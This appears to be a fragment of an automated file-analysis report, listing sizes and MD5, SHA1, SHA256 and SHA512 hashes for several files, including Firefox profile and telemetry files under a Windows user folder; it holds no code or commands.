SHA2569884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA5129908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3
-
Filesize
689KB
MD5840fc00dd63d2e71000497dcc0612c1b
SHA18ad5ef2c74c186762f70243033b62dffc29f2984
SHA25667a99310f4441a349a41189a1bcf4616fbc52f773467da27d857ae93992bcc78
SHA51225b299b233f857c49fe7d53cc9190e526e83a40ad28de157a248be49dc3bde64210623ea48b1ba2aa81e4474d2729adc31de7a69da5bb69e697f52378982dc38
-
Filesize
2KB
MD5a69559718ab506675e907fe49deb71e9
SHA1bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA2562f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63
-
Filesize
689KB
MD5e672d5907f1ce471d9784df64d8a306b
SHA16d094cae150d72b587c5480c15127d7059e16932
SHA2569f9250be71bd6254790a9630990f4560d53995db3d8737b7f49986e3551283e5
SHA5129cf10e997d8d99e6eb2f6ccac00ab365f63e03d96c2e2354fdf67683b85553a60cd9542cfb21cbea468c6a2bda454cde71937c0d21c4b738451b5e2c30690c39
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\AlternateServices.bin
Filesize6KB
MD5edf8d7136e27f07d665449a7b151d3a7
SHA158fc20c6826a6cde3619a636280e9a9b903ee786
SHA2565ccd7c05ffcdfc49c21c5bf3bf9833b322c452d1f94de2d52db9d4a1d9b31d3e
SHA512c5210e76fe46558740bdc5afd9610e7e403bd00a23c4ccbbed37410c2ffd7eaaaacd2bf8207ebccb30666ef30848537709d7be2b3d8b06145376626687db869c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\AlternateServices.bin
Filesize10KB
MD5801710a1d379580a9bdb23229814456f
SHA19a0f5f68cd1a08a6d35409d4a5888ec9ce446f2e
SHA256b025be49e6e64c9fe76d636c59b2fcdb96a77d9d3bc0abc84615450f585d0403
SHA5127972e002467c58f39cfa8da9af26651bd94e324066c503ef568238940690712b131dcf48ea0d52561e0bacf602417955a5a2a772f22bb6757e29261ba499a83d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\datareporting\glean\db\data.safe.tmp
Filesize22KB
MD578fb9e67bdff2ae42340abdeb0b04979
SHA18ed1e526d2e6c8bcf0a79b5a92a9e71b8c634d67
SHA256694ad64fdaf86475375a5842ac12950ddf701ef332f2a689022dce7aa75b4a36
SHA512e23c5f207f35a2ae54be882eed165eeec1c39a8701abcc569185a084d378ad47b22727cb950b71e0222371ca9bb6223ec88d3c7ba7c3a05cbd281d3d260a77fb
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\datareporting\glean\db\data.safe.tmp
Filesize23KB
MD5c47528a8c3d6ebacfcbbc1438d296d36
SHA1e6c87a0b0bb3ae74255ea95665c8c33f144568e6
SHA256a20d835fa12d6c86591f21fe1c0d68aa88c9cbfbfeb413ca1b96fc579e208e4b
SHA5120b69c5129623678732f7b6ff7e14c14c45a39be98ca1a42fbed6d50ae052d7f8ebd3f7731717033b731cc699cf69da9c8f764bb8ff68d97b6d524e774e889d62
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\datareporting\glean\pending_pings\0fa28898-e0dc-406a-8bd4-3b093a38cabc
Filesize982B
MD53537029a2d1ec4760eaa77f4baf582db
SHA17c729dfa2f6936defd6cd9cd0c2d12f2c4e99339
SHA2560abad39091c5749b797cc94d9e0ab3b0905c410ee8359defffae27bf65f5c72c
SHA5125b84276a287ff701aa9ecfd3e176feafe2ebfab584e07f1a68732d23990a6cb1e8a05c92c0aecf5e3a422b12c575424ddf475ca419e3cf0f1e67088c0ec8a6e0
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\datareporting\glean\pending_pings\f71dea33-7ecb-4dda-8a07-99596a2fdd0f
Filesize659B
MD5d26f139563a6d3ddef4c925359deff49
SHA1c126e15cfed26a7073a74816b6f4ae34b9286241
SHA256a3f24f8a34d1aeea9d390014d8801e301eb88112fad39993edda49045cfb65ce
SHA512999a0f264d0919af7cbacac660a02734badc51cc57a8c301899321b6de4321c0d0cb1f75646adf1dff7f19fd8cce38b343c91fce1038b8bf766eba396d321d19
-
Filesize
10KB
MD5189531998f495e193bde5a4ab4300258
SHA1f51709f9754adb99142e38cddefe8e6af4c320d9
SHA256de07ef79cc2cfec74688d3db2eda346991f39e1f0c7a824fb9fd7bc90cfb99f4
SHA512df2d9d120fe6aecd520753d72cc9e8178edf3adcce8035690891186246f9dea08c9d07bf1c9db448d1d330441b226c0da579fd5f8c5a9a794df70e0f0b67c779
-
Filesize
11KB
MD52c423b5a72ddf230db3870f2ce456cd9
SHA19ca80eac2df9b93c6024c16f50dd92ca5dabb226
SHA256d22a41fb1c902fbb89b8db616544f6a5aa9c8088c1420899faa57fb3831393a5
SHA512b548956939ffb1710e0305f2235192327ed4ff63e5f8d8f0287fbb439b8bc3c88b5db20f68741196ca3ef1b5c192098be203850b8fce8b038970a54530813e2a
-
Filesize
124KB
MD50d3418372c854ee228b78e16ea7059be
SHA1c0a29d4e74d39308a50f4fd21d0cca1f98cb02c1
SHA256885bf0b3b12b77ef3f953fbb48def1b45079faa2a4d574ee16afdbafa1de3ac7
SHA512e30dced307e04ae664367a998cd1ba36349e99e363f70897b5d90c898de2c69c393182c3afba63a74956b5e6f49f0635468e88ed31dd1e3c86c21e987ddd2c19